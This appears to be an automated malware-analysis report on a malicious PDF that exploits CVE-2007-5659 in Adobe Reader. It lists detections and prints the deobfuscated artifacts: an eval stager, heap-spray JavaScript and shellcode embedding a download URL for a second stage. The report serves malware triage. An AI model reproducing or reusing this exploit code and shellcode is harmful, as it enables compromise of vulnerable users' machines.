PDF malware analysis — malicious · 68d561aaaf0e48fb

MALICIOUS

PDF

17.2 KB

MD5: 9274b99ea0a37fa8fbbdfadf7ed1c0a9 SHA-1: a62bb7c05469ba6fa0745b45a805e18ec561c68a SHA-256: 68d561aaaf0e48fb1de128918c7b82e22e07795b80adb355bb165cc0f83c43b2

406 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.007 JavaScript T1105 Ingress Tool Transfer

This PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed as a multi-stage dropper, first decoding a payload from an annotation subject and then executing it. The decoded payload contains a URL, http://aiosstatsungenett.com/info/nag3.html/n002106204Xea1b012dY6802170f, which is used to download a second-stage shellcode.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 11

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 5 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE

PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER

PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER

PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://aiosstatsungenett.com/info/nag3.html/n002106204Xea1b012dY6802170f Referenced by PDF JavaScript

Extracted artifacts 5

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0009_000.js` `4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d`	pdf-javascript-stream	PDF /JS object 9 at offset 0x4281	469 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var pr = null; var fnc = 'ev'; var sum = ''; app.doc.syncAnnotScan(); if (app.plugIns.length != 0) { var num = 1; pr = app.doc.getAnnots( { nPage: 0 } ); sum = pr[num].subject; } var buf = ""; if (app.plugIns.length > 3) { fnc += 'a'; var arr = sum.split(/-/); for (var i = 1; i < arr.length; i++) { buf += String.fromCharCode("0x"+arr[i]); } fnc += 'l'; } if (app.plugIns.length >= 2) { app[fnc]/**/(buf); }
`annotation_subject_callee_hex_stage_000.js` `ae434026830945dd99a1aecbfb058f42f45d10904ffdee367da9807c876774d5`	deobfuscated-js	annotation-subject callee-key decoded JavaScript at offset 0x1A70	5286 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var Jh3B7ya = new Array();var ur_0tk_21T = 0;var lMX__nGAT = "";function DGqH_DeF_g(umP23_m1G, E_j__7_G__g){var XQQ4S0B = E_j__7_G__g.toString();var J0_S_1H_8_814iq = "";for(var Anp8K7___D7RL_s = 0; Anp8K7___D7RL_s < XQQ4S0B.length; Anp8K7___D7RL_s++) {var o2_M021M_3__43 = parseInt(XQQ4S0B.substr(Anp8K7___D7RL_s, 1));if (!isNaN(o2_M021M_3__43)) {o2_M021M_3__43 = o2_M021M_3__43.toString(16);if (o2_M021M_3__43.length == 1) { o2_M021M_3__43 = "0" + o2_M021M_3__43; }else if (o2_M021M_3__43.length != 2) { o2_M021M_3__43 = "00"; }J0_S_1H_8_814iq = o2_M021M_3__43 + J0_S_1H_8_814iq;if (J0_S_1H_8_814iq.length == 8) {break;}}}while(J0_S_1H_8_814iq.length < 8) { J0_S_1H_8_814iq = "0" + J0_S_1H_8_814iq; }var qQ__D0F_D_CR = umP23_m1G.toString(16);if (qQ__D0F_D_CR.length == 1) { qQ__D0F_D_CR = "0" + qQ__D0F_D_CR; }else if (qQ__D0F_D_CR.length != 2) { qQ__D0F_D_CR = "00"; }J0_S_1H_8_814iq = "3" + qQ__D0F_D_CR + "P" + J0_S_1H_8_814iq;return J0_S_1H_8_814iq;}function o__7o_87A87_1q(W__3s_K, kNL_4VN_Fv_6Lc){var dV7v6_P2_1 = new Array("");var xn_rMr = W__3s_K;var CWB_ssVa86;if ((CWB_ssVa86 = W__3s_K.lastIndexOf("%u00")) != -1) {if (CWB_ssVa86 + 6 == W__3s_K.length) {dV7v6_P2_1[0] = W__3s_K.substr(CWB_ssVa86 + 4, 2);xn_rMr = W__3s_K.substring(0, CWB_ssVa86);}}CWB_ssVa86 = 1;for (Anp8K7___D7RL_s = 0; Anp8K7___D7RL_s < kNL_4VN_Fv_6Lc.length; Anp8K7___D7RL_s++) {var Yi2OeDaIk__44 = kNL_4VN_Fv_6Lc.charCodeAt(Anp8K7___D7RL_s).toString(16);if (Yi2OeDaIk__44.length == 1) { Yi2OeDaIk__44 = "0" + Yi2OeDaIk__44; }dV7v6_P2_1[CWB_ssVa86] = Yi2OeDaIk__44;CWB_ssVa86++;}Anp8K7___D7RL_s = dV7v6_P2_1[0].length ? 0 : 1;dV7v6_P2_1[CWB_ssVa86] = "00";dV7v6_P2_1[CWB_ssVa86 + 1] = "00";CWB_ssVa86 += 2;if ((dV7v6_P2_1.length - Anp8K7___D7RL_s) % 2) {dV7v6_P2_1[CWB_ssVa86] = "00";}while(Anp8K7___D7RL_s < dV7v6_P2_1.length) {xn_rMr += "%u" + dV7v6_P2_1[Anp8K7___D7RL_s + 1] + dV7v6_P2_1[Anp8K7___D7RL_s];Anp8K7___D7RL_s += 2;}xn_rMr += "%u0000";return xn_rMr;}function Ky_wni1s(k_0ani, sK___41__J){while (k_0ani.length2<sK___41__J) {k_0ani += k_0ani;}k_0ani = k_0ani.substring(0,sK___41__J/2);return k_0ani;}function AX_cft3__21Sr(I8Y__r8__S, J4R3KO2_3434r, Tj2fa_J_7C){var aye81_w = 0x0c0c0c0c;var k_0ani = unescape(J4R3KO2_3434r);var kNL_4VN_Fv_6Lc = DGqH_DeF_g(I8Y__r8__S, Tj2fa_J_7C);var fp53_V___c0i = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var W__3s_K = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u5670%u4254%u0051%u7468%u7074%u2f3a%u612f%u6f69%u7373%u6174%u7374%u6e75%u6567%u656e%u7474%u632e%u6d6f%u692f%u666e%u2f6f%u616e%u3367%u682e%u6d74%u2f6c%u306e%u3230%u3031%u3236%u3430%u6558%u3161%u3062%u3231%u5964%u3836%u3230%u3731%u6630";app.vJ_siu__jyc1Al = unescape(o__7o_87A87_1q(W__3s_K, kNL_4VN_Fv_6Lc));var j___m_PTCn63 = 0x400000;var n5w5KmC = fp53_V___c0i.length 2;var sK___41__J = j___m_PTCn63 - (n5w5KmC+0x38);k_0ani = Ky_wni1s(k_0ani, sK___41__J);var w_U_3A_exid_e63 = (aye81_w - 0x400000)/j___m_PTCn63;for (var b_Q16fU_d___7 = 0; b_Q16fU_d___7 < w_U_3A_exid_e63; b_Q16fU_d___7++) {Jh3B7ya[b_Q16fU_d___7] = k_0ani + fp53_V___c0i;}}function Ep32X__I4WQd_X(){var Le17Y__4B2 ... (truncated)
`legacy_pdfkit_stage_000.js` `fa7bc6727745f32b3c212aa2c60c0ed69fc3124b4c44246a9601e44e0fbf74a6`	deobfuscated-js	repeated-marker hex decoded JavaScript at offset 0x1AC4	11918 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script function EUj_____C_G(s6Yj_t2I__B, y_fkF__GO8qtXsh){var C6k_hHe4QrRBeI5 = 512;var BI_8O_n = 2;var Jued_w6_E_84d5 = 0;var BY_x__R8_O8a = 0;var NdF_R5n23_e5 = "";var sog__a = "";var DcaAXT6_Lr_kn = 0;var YV_I46_Hq = 6 + 1;try {var s___01sLKAvc = 0;if (app) {BY_x__R8_O8a = BY_x__R8_O8a + 2;y_fkF__GO8qtXsh = pr[s___01sLKAvc].subject;}} catch(e) { }BY_x__R8_O8a = BY_x__R8_O8a + 7;var TkSm2w_v = new Array();if (!s6Yj_t2I__B) { TkSm2w_v = new Array(225,243,185,243,11,143);} else {TkSm2w_v = s6Yj_t2I__B;}var X6__R43d = 0;var X5OJT__1Y = 0;var X6a2_Kx = 0;YV_I46_Hq--;if (YV_I46_Hq == 0) {} else {for(X5OJT__1Y = 0; X5OJT__1Y < y_fkF__GO8qtXsh.length; X5OJT__1Y += BI_8O_n) {if (X6__R43d >= YV_I46_Hq) {X6__R43d = 0;}var YWO_2_yVWn = y_fkF__GO8qtXsh.substr(X5OJT__1Y, BI_8O_n) + "YY";var VJd3m7lXjvu = parseInt(YWO_2_yVWn, BI_8O_n + 10 + 9);VJd3m7lXjvu -= TkSm2w_v[X6__R43d] * (X6a2_Kx + BI_8O_n);X6__R43d++;if (VJd3m7lXjvu < 0) {VJd3m7lXjvu = String.fromCharCode(VJd3m7lXjvu - (Math.floor(VJd3m7lXjvu / 256) * 512 / 2));} else {VJd3m7lXjvu = String.fromCharCode(VJd3m7lXjvu);}if (BY_x__R8_O8a == 9) {NdF_R5n23_e5 += VJd3m7lXjvu;} else if (BY_x__R8_O8a == 8) {NdF_R5n23_e5 += xggY5cx_j;} else {if (BY_x__R8_O8a != 9) {NdF_R5n23_e5 += X5OJT__1Y;}}X6a2_Kx++;}}var cP3K_t_4U2 = this;cP3K_t_4U2['ev'+'al'](NdF_R5n23_e5);} EUj_____C_G(0, "2e2g42ad6e3i2h9g58b3aj4f6d49c26a2j90a34d442c631a03aa8ab18k587298ba500011982d1430b7339fb05g0j589k0ia3af7k89137j4e21418c3h7bb84eb72iag28ag0a9h692b205c296a7f6271396a1j037g0b02b1850h2a3a5f2b45315b634f7g2k76b1870abibh9g4a1f914e4f2k6g3634761g518f5eafaf06a23had823i7d0b82233k8k5h321460310c1f441j6fc341af6k7g9b777a62ajbk2j1gc30b1i326f0g1195446b6e6e8a7jb5b21h4g0k09c16b4ib634a049a27883677c6e24be2faf1a8a4gb10c4k1cc09h36aa87953b0k7j5i056a4k5a8i2f3e1391ai0ga362aj27456f8h0g4i2468a84j2c1j69c20h087599ai36439ha353c15a8h654d4h2c178e197ga36c2e129jad8ebi723434301k3d179b3990046e6b97adc39171950i5i286k1221784b9fbi1g6jaca3bk8i67aa0j702j698c2c54235j13a1465i17138h0k84b8a642845j0d2h3a903b7d5834110jag0hbh6e86296c0k550d4b924c4i61102210bha5064a97228ca8577f7f8745246e0340b42g7ab225a364c0a1658c95a07jb377912abe4651ahbf223302703e377d8b8c8ja48h41b82b2c2c0e2g681c224k1e7i767155003d7jb95jab0f7h154d240575129i7a7e3i8b1b5kag3k630d8b275c289b5g8jc29e9d2f000473c150764c646a5k169a8j5jb8abadc3c0a083be84322i386c3f353j9i703ca52d9hab729fak7k9k2d2b4d6d453a91261g7g1h6dc27i04c0916g4e845g3f54a08ibb68911a3i225eb50i00536k737b408kb085af30aj2d122a1503c104455b6hag427948997361805h9k40b62523051a69299g6fb92j0i86527f5i5b4eaf480121aj7229b0439c271j399gaf8d58679b290f2c537g9iaj7g0d00203eag8ha83e79816j2j5i5e7e950b6b0k8b0406b58ga09h4a2e80383k35b58g447d302g1888a98381a5471b672d6gc1994g4i4i3d131b731dbe924b509d78c0586h962e3e6h4205245j24910k1b6a86b33e7f3b242c717h2fab484h359fbkbd976ibf1c9i0gc08a917e614g3d2d4k8j1j7fb06f0040051a2h9e694j5i1c4e0j5e841a83a03g1d1ha7952g5ha25i85b57eaf72be634k87c31104b9520965838395ah7f6k54a4640ac0a532060i1j140a96488a5195588aba5k8kba983a38241b319f2a7g0965970ia0bj565h206b5h3a369745ab0h7cbf1j7826ai049f6e25203j1k2d6e3b574a4e2gb6a8bea79b942j142h6c313e493g351k5b017a81ajbe9db9bg33ad7i3g5i365c1g34874i39a246ah9i9c6c177dai348g0b6hbf527k3g3eb14abg9cab3j3g5b811a6h8k6bbg6g813jc00i113da604205d72a84kb384aaaa925363821b034ea127163k41b61k9i4jak5eai8c958628bf640j547f751i20271b1e8j36916a774h0e9843c15b7k510d3138bc82c024ad89851d2f676d196c356j9i1b5g3k890ha00d829908254383aa7d055a5i2355446f9g98279b069k25b570a36k0g9564345h5e2h237g385fbh2k53bkakafae928i18874h6j950c61238h35435g9ia3ak916haha25e245f9214455b9i2j0b505da1b88h34b3aj755i825g0j2e5f9k588h855d2422c213945h7d616j1f109a42622a5a540h0gadajbc0g6i892a8i0h349i8ea3614970b510ahbk5ba32fai24aiad555c9f966cb9a3b65g1c4h53b5b72e5bbi5k703b9h8e69b0808d3i141i07babg2858b5616c278ba9ae88bh7d81ak4cb01c9k48691g2958b78j727e39921961b2559h477g584f438g6682089ebf0d0k2586b98k6j496b6b6c4g9f8k66bg779gah06aia62da02e511b4d343d7eae582a8a1da7269db9c2839b40a859436f45ah1b168b3879036jaa1ib39g50968151791e7c0f1k7h200i15682102b5526k909f4g6c9ba7036k7332a63j2e1821b43h6h6h9c759b59b0a74fai62b548263g09b60190599k568e4d087k6h89656i4e011jbk0c7ja63b0g758d1c1b3d88af6d52469e592723626dahaj ... (truncated)
`legacy_pdfkit_stage_001.js` `fe43490460d723047c733d47cbb1b509876a4560f4baec60b3e80e3e4589a073`	deobfuscated-js	nested inline base-23 callee-key decoded JavaScript at offset 0x1AC4	5286 bytes
Preview script First 1,000 lines of the extracted script l �^(�' k�UN�\�3�-�p�E8s �ќ Cf7^ cg��L���b�d�� a�� \|��sp �!�O� R�7 ò�DŇ� �� (&ͽ� M7�� v' ��UoD�F ~�x y�=s�� 4+7.f�\��II�!Ю� ? /�d .7 Y�-ۨ�h ��>�R� k� yP~b!]ի��a�X!;�)�R[�s`v0 ��O� /� ��: ?-�?p�� )�X�" �r� ��CJS �w Yy�p��i j�:�A ~c uO�_� ��y� � � ��WBcBpJ�~1n��#`B �IAk��Qr 1�tRͷ ōJ��[��v�� ! �� .��k;��V�lG>�`�o V� {�� ?\^�g�� ڟ�W8��uPZ\��!Q. �� 9 �� A.M �;��)h3��V � b �� X r��H�� %��i��Ŏ� � �tI�r �:w� f�G�O��D� ��( ��,GY T�r�l#T 74�� C3�� f�n�i�� \|g�9 �#�qt3�[-� ��? � Ǳ� u %H �j {S�� a g�M1с�\�X E� ��>� o�- �BaXKX��?eʼq�y��!�y E �iXe��l� ��w��H �0�� s�� k��>2�s1�{ �>Y:1ԏ��B�0 � ��]�-��s� .ß� Y��% �9�x�)�/s��r�&\|ѳ�; � iG��Q� ��k� �x$ ��(x��r��pnG�xq 8w�gS��n�-�o/� ��2z��D[ Q7r�Rg��9 �� U�a�� {�� {Z��#�M� +��臊� ه �Ҫ�~�) E�zV� ;H��I�C ��:KDύ��z�Nf .'y ��$ �C Bp+h�t.��v��E1)��e�Y ^�7� ��w� �� i�0� mb X߽�+��~%< G"@�ѕ%uA$� )��%�-�})9 �[��h��!�h�: �%�0�ЖH^S �w�`��pU�x ɪK�j5�Z�4E�`�^�4܃�� :%��=��{qYO��d[ 8��[F1 jOKr̼Ba) �� V5��+� ��s��%3�� 0ʹ1�\|�� %l��e ��׌�tMa�� F�� 6��lIk �s��)Ɂ��k �ReT��.7\| ��5O5��\|� -E�m aŒ�{�A�J��"�_��G��B r� �g ��&�Np��[�/]�Ý�� N�\| x&W�(� q̃j�9�k�� o��&Z�^ �1^"�� n- '� 1�ġ�L��"�JFr%�q�e % � �4�t_,�+Ħ� ZVU`8�JP�r� ٪A>��-��w݂�b8 Qa!kd��+�� #aE)��e\ࢇ�i�� ^b.#��M"FwV �� Ǌ� �rl� ��LG��S�p�u` Pur��/1ol�`��u F/�]E��\4�e � ~� 7rY� W��%�;��)� f��Ԅ�`�h��]/��?a��0�� SȜ� ��P��S��;t�ɝ� \|xy@��a�:��nAee'�F$m홶-�kD�0��;�C�ޚ %7� P;��W7�� h�U��H�v�5�� <Ǭ�V d�;v��2�ϖ.�c � ��Ǳ�K�2g��F� .Jy��X�] ��a_i�{A� ��df .��`� �� G~e� \|s��v�� 9�:� $:a��ܖ�-� =�E� $� yP~b!]ի��a�X!;� �@R�hoj8��zO��[�1 � �}?D=� ��Rب�~?��0�n��0QS �w�e��@´�?�(3�d CJ�g�QD$�X�� H�� .1�N:�d� +ҺE@�+eq \| �gU11юm��C V!��)D R�� :4⩙�5�ιR��u-�Ȉ�Y��mf��ڃeB� 6��;��y\Ոb��T��0��6 y��9xr�� HmN �� L#\�� }�7��J+� �Z�� ۇK�� 5��S �� ?p��c�1�� ȒS��;�<C�1�� u�U��>��C_?ŋ~ �) A�! ؛T=�=�&s��Q�93� �q�1� � �а M� �� Dm�Q �U� }�� x�� 팢��iM PpC��0�r� �� [ ��FF �\|�]�� aM C��b ]��Q� x�\|��@ �,��C{��~.�ӈW0��k>a yUq�D�.B4V�o{� U�3� 5�!�$�L��j =BЋ�P;�i��1�9��)��y\|��z5��\|tb4� [S��3�m3Lü� �1� ��G`�nax ��mv(��y S$�M i�a� �E os��{��^ 7g�?4}�- �� !� �ɡ =�~�4į h9��ݛ x�e1 � ��gw�e � �� ;hr��K "6�u��B�C� � l�3ہ.��} �Ex՟ ��7"L Xwcz�Xs�7�� A��J� 7Hb�� ~4��O� ��)� i BMOU��˥�=��O U��j UZ �bE� +�5 � �<�g � p� m��g�2�f!�Ｇ� "EҼ7 g~��;�=ԅ�-�+ �b��Uv7� E Ћe� L �n��n<<7��\|d�o�� )dB 8� NL 4��n �I��' ��K]n��"�;�h��݅. � ݱ ��w\|��]g��E��pr�S N$Z��/� �F��+�l�_%3�6 �Y�� 0. ��;P�G�� ]xj�g�ߴ8z��[�� Ua�� ɇR�� Βð�) ��{��a��˸�V�O �� yS�8H� ��&��U�\|� ��/��XEK &R �c��R�R' �k K .�& ��qɘ�� }m��K� �w_}� ��N�� ͍ %_ �� L4t� �F�Y J$�\��u � � }{k�As� յM( Dq�6[�m�+��M� �� g0A� C ��F� � �� wxi�@m�� 9��fS! H P��m-03ÝX��U�{ � Kc5^;�4� �]) �X�2&�� "�Qp~ ��/h\|��w�p ~Ӎ�s�� kw�1�is �y�� hɘG��(e�s��\|s;��4�- �� P 'iE a͹� �^ �-��F�;��[ �i b <'Ӫ$��Q�m�ʥ㽓�~�6��g6��5pH{�#��'핏�3�l � ٚ�mm_,16�}��R5`a��+�7= ��5?��Q��׽�_\| 3-T� ��W��G �0��1�� W0��T�q a��̱-� � �ف� �A-�>Uۮ�#[�=$�%=�YU��&f+!�� c�M ��AA$>� e� ��9�<(Yy��[<� 7 f��;�k�\|�-�'9��ky1� E昋d� �: ��mxx7�L�z��o��KU�)nwHq� Q��7�ß�� )��K]n�� ;�n� ��~2 ݵ ��w��]g��E��>V�S W [��/� �B��+��_%3�9 oY�� 72 ӻ� R�G�� ]~o�5�ߴ5�3��[�� Ua�� ɇ ��B��e��)� �#�{�8`��˾�\ O ɉ {yS�@F� ��`�PU�B� ۩/��Z_K T �c��R� ' ��l K�� s�f��}:��K� �@_}� ��K��$�� ȁ�͍ $] �� O1k� ԪI�V�E0 Z��݅Y%S�Nï5�8\�� ;qMET��w� ��0�� am 7��MO+��J� ��` �_j�Cig��u��U!��r>� Sh \|6t40�jX�� x #_u �K�9�� _�=R�� i �X� "' B`r��0�� ӥ5~ϳ�X䭴dS��UۘN �z�̵x$ ��Su�~��m}��x�&�xu[}s6�CiX ��/�a jq�'u� �͉0�)8�(��W�� O (��}۱��c<��h v�.5�0 �ϵ_�� ՝�� xm�x� ?1`��?�]��˶2W.�{ �� y�=s [��`�? Q�h��w�핮 E/� �[ ^7E��駱��H�� Y��l�9g ti7�ի�ߋ�G�3 ��s lT뗧D� [� �O pA`A�W�Ь{ ��O�O��Q� 蘟a�� b _��{�H�j�&` #��00D�X� �˃w��r ��2I*U��O W�� B +�0 &��W< B䀁��C�\|/ �+� _eD;�)�o� +�� ՛��D� �a�і�]g��E�\|qP�N�[o��:6��-�?yG�^��g�c ��CP��h� tt �� 5� ��Q� fj� ��8�� o �4�I�� Y �� F��y�� y��S� ... (truncated)
`deobfuscated.js` `387fa19d5cbe48f89ad1c8ca44465f0cc0fd3552db11f2faae005931a398fe17`	deobfuscated-js	PDF JavaScript deobfuscation pass	96036 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 6 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script 2e2g42ad6e3i2h9g58b3aj4f6d49c26a2j90a34d442c631a03aa8ab18k587298ba500011982d1430b7339fb05g0j589k0ia3af7k89137j4e21418c3h7bb84eb72iag28ag0a9h692b205c296a7f6271396a1j037g0b02b1850h2a3a5f2b45315b634f7g2k76b1870abibh9g4a1f914e4f2k6g3634761g518f5eafaf06a23had823i7d0b82233k8k5h321460310c1f441j6fc341af6k7g9b777a62ajbk2j1gc30b1i326f0g1195446b6e6e8a7jb5b21h4g0k09c16b4ib634a049a27883677c6e24be2faf1a8a4gb10c4k1cc09h36aa87953b0k7j5i056a4k5a8i2f3e1391ai0ga362aj27456f8h0g4i2468a84j2c1j69c20h087599ai36439ha353c15a8h654d4h2c178e197ga36c2e129jad8ebi723434301k3d179b3990046e6b97adc39171950i5i286k1221784b9fbi1g6jaca3bk8i67aa0j702j698c2c54235j13a1465i17138h0k84b8a642845j0d2h3a903b7d5834110jag0hbh6e86296c0k550d4b924c4i61102210bha5064a97228ca8577f7f8745246e0340b42g7ab225a364c0a1658c95a07jb377912abe4651ahbf223302703e377d8b8c8ja48h41b82b2c2c0e2g681c224k1e7i767155003d7jb95jab0f7h154d240575129i7a7e3i8b1b5kag3k630d8b275c289b5g8jc29e9d2f000473c150764c646a5k169a8j5jb8abadc3c0a083be84322i386c3f353j9i703ca52d9hab729fak7k9k2d2b4d6d453a91261g7g1h6dc27i04c0916g4e845g3f54a08ibb68911a3i225eb50i00536k737b408kb085af30aj2d122a1503c104455b6hag427948997361805h9k40b62523051a69299g6fb92j0i86527f5i5b4eaf480121aj7229b0439c271j399gaf8d58679b290f2c537g9iaj7g0d00203eag8ha83e79816j2j5i5e7e950b6b0k8b0406b58ga09h4a2e80383k35b58g447d302g1888a98381a5471b672d6gc1994g4i4i3d131b731dbe924b509d78c0586h962e3e6h4205245j24910k1b6a86b33e7f3b242c717h2fab484h359fbkbd976ibf1c9i0gc08a917e614g3d2d4k8j1j7fb06f0040051a2h9e694j5i1c4e0j5e841a83a03g1d1ha7952g5ha25i85b57eaf72be634k87c31104b9520965838395ah7f6k54a4640ac0a532060i1j140a96488a5195588aba5k8kba983a38241b319f2a7g0965970ia0bj565h206b5h3a369745ab0h7cbf1j7826ai049f6e25203j1k2d6e3b574a4e2gb6a8bea79b942j142h6c313e493g351k5b017a81ajbe9db9bg33ad7i3g5i365c1g34874i39a246ah9i9c6c177dai348g0b6hbf527k3g3eb14abg9cab3j3g5b811a6h8k6bbg6g813jc00i113da604205d72a84kb384aaaa925363821b034ea127163k41b61k9i4jak5eai8c958628bf640j547f751i20271b1e8j36916a774h0e9843c15b7k510d3138bc82c024ad89851d2f676d196c356j9i1b5g3k890ha00d829908254383aa7d055a5i2355446f9g98279b069k25b570a36k0g9564345h5e2h237g385fbh2k53bkakafae928i18874h6j950c61238h35435g9ia3ak916haha25e245f9214455b9i2j0b505da1b88h34b3aj755i825g0j2e5f9k588h855d2422c213945h7d616j1f109a42622a5a540h0gadajbc0g6i892a8i0h349i8ea3614970b510ahbk5ba32fai24aiad555c9f966cb9a3b65g1c4h53b5b72e5bbi5k703b9h8e69b0808d3i141i07babg2858b5616c278ba9ae88bh7d81ak4cb01c9k48691g2958b78j727e39921961b2559h477g584f438g6682089ebf0d0k2586b98k6j496b6b6c4g9f8k66bg779gah06aia62da02e511b4d343d7eae582a8a1da7269db9c2839b40a859436f45ah1b168b3879036jaa1ib39g50968151791e7c0f1k7h200i15682102b5526k909f4g6c9ba7036k7332a63j2e1821b43h6h6h9c759b59b0a74fai62b548263g09b60190599k568e4d087k6h89656i4e011jbk0c7ja63b0g758d1c1b3d88af6d52469e592723626dahaj70bia81f1b9g9f8k11726j4b1b5931aaae2i7904962d1e9hbd78a5785b5e1c482dak812b4f1k4i31039f88c19e6g3b9a328105903e2j431j3a4164afab0840750d872h779i023e3i4g270i4e7f2cbj1808718f7e0d6i3b22ae6e783c8j573b379k2c0d97629ec28i0gaf955240463j593223a7378ga24j1330bbb3017c618b813f4a1b38b43853ae1c191g00912g81b16g8kbf52a7389e2345bhbd1j3a037g285ab3767i8g606j71a0642f0gb33h190b291d10195kbe8i6b526cba75b4b87a432a3b321gb2a57fbc38a31j9bai6389b3703c3825005fb52a8c16bf84ai878e7c2ebh3672333f9j4387295b1j9ga4a7b5a8a83i3928801h4f5k3g4b144i0f6k837g0fb99b15140d851d7f12752d4i6a40780a6i1da2ab6c177d7h3g5gb252b1415f231kb14f14c1267g418b94206h7a738g54676c15a10610041k236546c2378f74757590897iaf2b131e9i09c16b4ib634a049a27883677c6e24be33971f7f47bab45c10158i668b878b2e2i676cb2536c730d403j1j959a2j8b6h76b716424jah806785a34f4f056j0d1daf7c99ba44437caf701b8a89232i0j5h038j2b6e04802f1k7fa896c39i5e745128c02c9h348f2352698k8ab46f647143471f3b9523601d9j07345a7dc0afac4jb41f693i539a2c4536702fbf6i8ba1ab8h18b17j6i1j876617333e903e7f7b341fbe181d9k7g8a50933k2da361845981821a1b1f2b88bb4db952a4c22e956h94791768bc10b3118j23510662a8bb255473664db0ac8g2hb31c1hc2311d66138g6d2ab0a28cbj979f482f54303003385i1j5h3c27c29aag8kb74982ak6ab80fa1435kbkbb8403bj9cae399749840a489k4g844k643b8g56be0g79bh390ac29i1i8f655660303b2d9k7d8j1h9gaf9k0e0196b661495b38475i616f6545156i2498b6a3c125881g6414585k723k6j2j0j ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.